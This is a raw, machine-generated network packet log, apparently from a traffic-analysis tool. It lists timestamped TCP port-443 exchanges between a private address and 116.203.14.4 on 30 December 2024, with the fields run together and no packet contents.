                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138288975 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138310909 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138320923 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138325930 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138336897 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138341904 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138371944 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138413906 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138422966 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138458014 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138467073 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138482094 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138490915 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138530970 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138540030 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138617992 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138632059 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138653994 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138664007 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138681889 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138691902 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138719082 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138740063 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138935089 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138948917 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138971090 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138983965 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.138989925 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139003992 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139010906 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139041901 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139056921 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139065027 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139178991 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139189959 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139206886 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139219999 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139235973 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139252901 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139255047 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139261007 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139270067 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139307022 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139317036 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139327049 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139338970 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139358997 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139364958 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139393091 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139393091 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139408112 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139411926 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139442921 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139482021 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139497995 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139509916 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139518023 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139523983 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139581919 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139583111 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139594078 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139619112 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139636993 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139847994 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139862061 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139888048 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.139923096 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140018940 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140033007 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140103102 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140115023 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140136003 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140147924 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140163898 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140182018 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140188932 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140206099 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140211105 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140223026 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140480995 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140499115 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140561104 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140571117 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140588045 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140604973 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140616894 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140626907 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140628099 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140639067 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140674114 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140688896 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140722036 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140733004 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140743017 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140753984 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140897036 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140906096 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140922070 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140944004 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140959978 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.140994072 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141005039 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141015053 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141112089 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141128063 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141134024 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141145945 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141148090 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141163111 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141175032 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141185999 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141195059 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141197920 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141206980 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141213894 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141248941 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141262054 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141272068 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141297102 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141309023 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141386032 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141401052 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141427994 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141439915 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141509056 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141516924 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141521931 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141539097 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141545057 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141614914 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141628981 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141660929 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141669989 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141683102 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141694069 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141737938 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141752958 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141787052 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.141799927 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142051935 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142071962 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142086029 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142102957 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142139912 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142151117 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142153978 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142165899 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142184019 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142196894 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142213106 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142249107 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142261028 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142297983 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142306089 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142321110 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142343044 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142447948 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142460108 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142481089 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142493010 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142494917 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142508984 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142543077 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142559052 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142571926 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142585039 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142621994 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142640114 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142652988 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142724037 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142733097 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142748117 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142765045 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142841101 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142853022 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142863035 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.142874956 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.304277897 CET53950443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.304332018 CET44353950116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.304567099 CET53950443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.304838896 CET53950443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:43.304848909 CET44353950116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:44.764508963 CET44353950116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:44.764565945 CET53950443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:44.766133070 CET53950443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:44.766141891 CET44353950116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:44.768170118 CET53950443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:44.768177032 CET44353950116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:45.429023027 CET44353950116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:45.429052114 CET44353950116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:45.429119110 CET44353950116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:45.429121017 CET53950443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:45.429147005 CET53950443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:45.429193020 CET53950443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:45.435213089 CET53950443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:45.435235977 CET44353950116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:45.446213961 CET53952443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:45.446279049 CET44353952116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:45.446629047 CET53952443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:45.446882010 CET53952443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:45.446898937 CET44353952116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:46.118366003 CET44353952116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:46.118685007 CET53952443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:46.128401995 CET53952443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:46.128423929 CET44353952116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:46.132087946 CET53952443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:46.132100105 CET44353952116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:46.798635006 CET44353952116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:46.798666000 CET44353952116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:46.798696041 CET53952443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:46.798722029 CET44353952116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:46.798727036 CET53952443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:46.798768997 CET53952443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:46.871325016 CET53952443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:46.871345997 CET44353952116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:46.887186050 CET53954443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:46.887221098 CET44353954116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:46.887283087 CET53954443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:46.887799978 CET53954443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:46.887811899 CET44353954116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:47.529320002 CET44353954116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:47.529390097 CET53954443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:47.529961109 CET53954443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:47.529969931 CET44353954116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:47.532072067 CET53954443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:47.532080889 CET44353954116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:47.532149076 CET53954443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:47.532155037 CET44353954116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:48.228723049 CET44353954116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:48.228806973 CET53954443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:48.228811026 CET44353954116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:48.228883028 CET53954443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:48.230030060 CET53954443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:48.230055094 CET44353954116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:48.892191887 CET53961443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:48.892240047 CET44353961116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:48.892448902 CET53961443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:48.892739058 CET53961443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:48.892749071 CET44353961116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:49.545169115 CET44353961116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:49.545295954 CET53961443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:49.545934916 CET53961443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:49.545947075 CET44353961116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:49.548315048 CET53961443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:49.548337936 CET44353961116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:49.548365116 CET53961443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:49.548373938 CET44353961116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:49.717158079 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:49.717227936 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:49.717237949 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:49.717288971 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:49.718391895 CET53948443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:49.718405008 CET44353948116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:49.910516024 CET53965443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:49.910558939 CET44353965116.203.14.4192.168.2.9
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:49.910657883 CET53965443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:49.910994053 CET53965443192.168.2.9116.203.14.4
                                                                                                                                                                                                                                                                                          Dec 30, 2024 15:55:49.911014080 CET44353965116.203.14.4192.168.2.9
